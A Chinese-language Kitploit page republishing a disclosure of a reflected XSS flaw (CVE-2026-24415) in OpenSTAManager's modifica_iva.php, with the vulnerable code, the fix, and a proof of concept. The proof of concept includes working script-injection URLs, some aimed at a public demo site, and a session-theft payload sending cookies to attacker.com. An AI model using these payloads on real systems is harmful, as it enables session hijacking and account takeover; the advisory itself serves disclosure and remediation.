Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-24415 — CVE-2026-24415 - OpenSTAManager 在 modifica_iva.php 中通过 righe 参数受到 XSS 漏洞影响 | Kitploit
工具/GitHubGitHub/lukasz-rybak/cve-2026-24415
漏洞分析漏洞利用Web应用程序漏洞利用Web安全渗透测试学习与教育
GitHublukasz-rybak/cve-2026-24415

CVE-2026-24415

CVE-2026-24415 - OpenSTAManager 在 modifica_iva.php 中通过 righe 参数受到 XSS 漏洞影响

查看仓库
25个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2026-24415:OpenSTAManager 在 modifica_iva.php 中受 righe 参数影响的 XSS 漏洞

概述

字段详情
CVE IDCVE-2026-24415
严重性中危
安全公告查看公告
发现者Lukasz Rybak

受影响产品

  • devcode-it/openstamanager(版本:< 2.9.8)

CWE 分类

  • CWE-79:网页生成过程中对输入的不当中和('跨站脚本')

详细信息

摘要

OpenSTAManager v2.9.8 中存在多个反射型跨站脚本(XSS)漏洞,允许未经身份验证的攻击者通过精心构造的 URL 参数在其他用户的浏览器上下文中执行任意 JavaScript 代码,可能导致会话劫持、凭据窃取和未授权操作。

易受攻击的参数: righe(GET)

详情

OpenSTAManager v2.9.8 在发票/订单/合同修改模态框中包含多个反射型 XSS 漏洞。应用程序未能在将来自 righe GET 参数的用户输入反映到 HTML 输出之前对其进行正确过滤。

漏洞代码位置: 文件:/modules/contratti/modals/modifica_iva.php(第 125 行)

root@kitploit:~
<input type="hidden" name="righe" value="<?php echo $_GET['righe']; ?>">

$_GET['righe'] 参数未经任何使用 htmlspecialchars() 或等效函数的过滤,被直接输出到 HTML value 属性中。这允许攻击者突破属性上下文并注入任意 HTML/JavaScript。

所有受影响文件:

  1. /modules/contratti/modals/modifica_iva.php - 第 125 行,第 167 行
  2. /modules/preventivi/modals/modifica_iva.php - 第 125 行,第 167 行
  3. /modules/fatture/modals/modifica_iva.php - 第 121 行,第 161 行
  4. /modules/ddt/modals/modifica_iva.php - 第 125 行,第 167 行
  5. /modules/ordini/modals/modifica_iva.php - 第 125 行,第 167 行
  6. /modules/interventi/modals/modifica_iva.php - 第 125 行,第 167 行

PoC

前提条件:

  • 正在运行的 OpenSTAManager v2.9.8 实例
  • 有效的管理员凭据(测试实例的用户名:admin,密码:admin)

步骤 1:登录

root@kitploit:~
curl -c cookies.txt -X POST 'http://localhost:8081/index.php?op=login' \
  -d 'username=admin&password=admin'

步骤 2:触发 XSS 在浏览器中访问以下 URL(或使用带有 cookie 的 curl):

root@kitploit:~
http://localhost:8081/modules/contratti/modals/modifica_iva.php?righe="><script>alert(document.domain)</script>

测试过的 URL(全部存在漏洞):

  • https://demo.osmbusiness.it/modules/contratti/modals/modifica_iva.php?righe="><script>alert(document.cookie)</script>
  • https://demo.osmbusiness.it/modules/preventivi/modals/modifica_iva.php?righe=1"><script>alert(document.cookie)</script>
  • https://demo.osmbusiness.it/modules/fatture/modals/modifica_iva.php?righe="><script>alert(document.cookie)</script>
  • https://demo.osmbusiness.it/modules/ddt/modals/modifica_iva.php?righe="><script>alert(document.cookie)</script>
  • https://demo.osmbusiness.it/modules/ordini/modals/modifica_iva.php?righe="><script>alert(document.cookie)</script>
  • https://demo.osmbusiness.it/modules/interventi/modals/modifica_iva.php?righe="><script>alert(document.cookie)</script>

预期结果: JavaScript 警报弹窗显示当前会话 cookie,确认代码已执行。

HTML 输出(已在在线实例上验证):

root@kitploit:~
<input type="hidden" name="righe" value=""><script>alert(document.cookie)</script>">

验证:

image image

备选载荷: 会话窃取:"><script>fetch('https://attacker.com/?c='+document.cookie)</script>

影响

受影响用户: 所有可以访问合同、发票、报价或订单模块的已认证用户。

攻击场景:

  1. 攻击者构造带有 XSS 载荷的恶意 URL
  2. 攻击者通过电子邮件/聊天/钓鱼将 URL 发送给受害者
  3. 受害者(已认证用户)点击链接
  4. 恶意 JavaScript 在受害者的浏览器上下文中执行
  5. 攻击者可以:
    • 窃取会话 cookie → 完全接管账户
    • 以受害者身份执行操作(创建/修改/删除记录)
    • 窃取 CSRF 令牌并绕过 CSRF 防护
    • 重定向到钓鱼页面
    • 注入键盘记录器以捕获敏感数据
    • 修改页面内容以诱骗用户泄露凭据

推荐修复方案:

root@kitploit:~
<input type="hidden" name="righe" value="<?php echo htmlspecialchars($_GET['righe'], ENT_QUOTES, 'UTF-8'); ?>">

将此修复应用于“详细信息”部分列出的所有受影响文件。

参考资料

  • https://github.com/devcode-it/openstamanager/security/advisories/GHSA-jfgp-g7x7-j25j
  • https://nvd.nist.gov/vuln/detail/CVE-2026-24415
  • https://github.com/advisories/GHSA-jfgp-g7x7-j25j

免责声明

该 CVE 已按照协调漏洞披露实践进行负责任地披露。此处提供的信息仅用于教育和防御目的。

下载工具